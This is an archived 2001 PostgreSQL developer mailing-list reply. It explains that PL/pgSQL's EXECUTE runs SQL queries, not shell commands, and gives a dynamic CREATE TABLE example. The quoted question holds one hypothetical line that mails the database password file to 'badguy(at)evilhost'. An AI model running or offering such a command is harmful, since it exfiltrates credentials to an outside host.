| From: | "Dominic J(dot) Eidson" <sauron(at)the-infinite(dot)org> |
|---|---|
| To: | KuroiNeko <evpopkov(at)carrier(dot)kiev(dot)ua> |
| Cc: | pgsql-hackers(at)postgresql(dot)org |
| Subject: | Re: Security hole in PL/pgSQL |
| Date: | 2001-01-29 17:45:59 |
| Message-ID: | Pine.LNX.4.21.0101291142270.9025-100000@morannon.the-infinite.org |
| Views: | Raw Message | Whole Thread | Download mbox | Resend email |
| Thread: | |
| Lists: | pgsql-hackers |
On Mon, 29 Jan 2001, KuroiNeko wrote:
> Sorry if I missed the point, but if I got it right, Pl/Pgsql EXECUTE will
> allow execution of any program via exec*() call? If so, this will allow any
> (system) user to execute arbitrary code as postgres (system) user, right?
> If so, how can something like
>
> EXECUTE '/bin/mail badguy(at)evilhost < /usr/pgsql/data/pg_pwd';
Being as I was sort of the person who got EXECUTE into plpgsql... I find
it odd that people think you can execute random shell commands.. AFAICS,
EXECUTE is used to execute SQL queries (for when you don't want to cache
the query plan?) ...
EXECUTE '' CREATE TABLE '' || NEW.dbs_name || '' (
'' || NEW.dbs_name || ''_id serial,
'' || NEW.dbs_name || ''_name varchar(20),
'' || NEW.dbs_name || ''_desc text,
'' || NEW.dbs_name || ''_qty int4
);'';
I don't see how anybody could think you are allowed to execute random
garbage through exec*()...
--
Dominic J. Eidson
"Baruk Khazad! Khazad ai-menu!" - Gimli
-------------------------------------------------------------------------------
http://www.the-infinite.org/ http://www.the-infinite.org/~dominic/
| From | Date | Subject | |
|---|---|---|---|
| Next Message | Bruce Momjian | 2001-01-29 17:52:04 | Size of TODO.detail |
| Previous Message | Bruce Momjian | 2001-01-29 17:45:24 | Re: AW: Shouldn't this be an error? |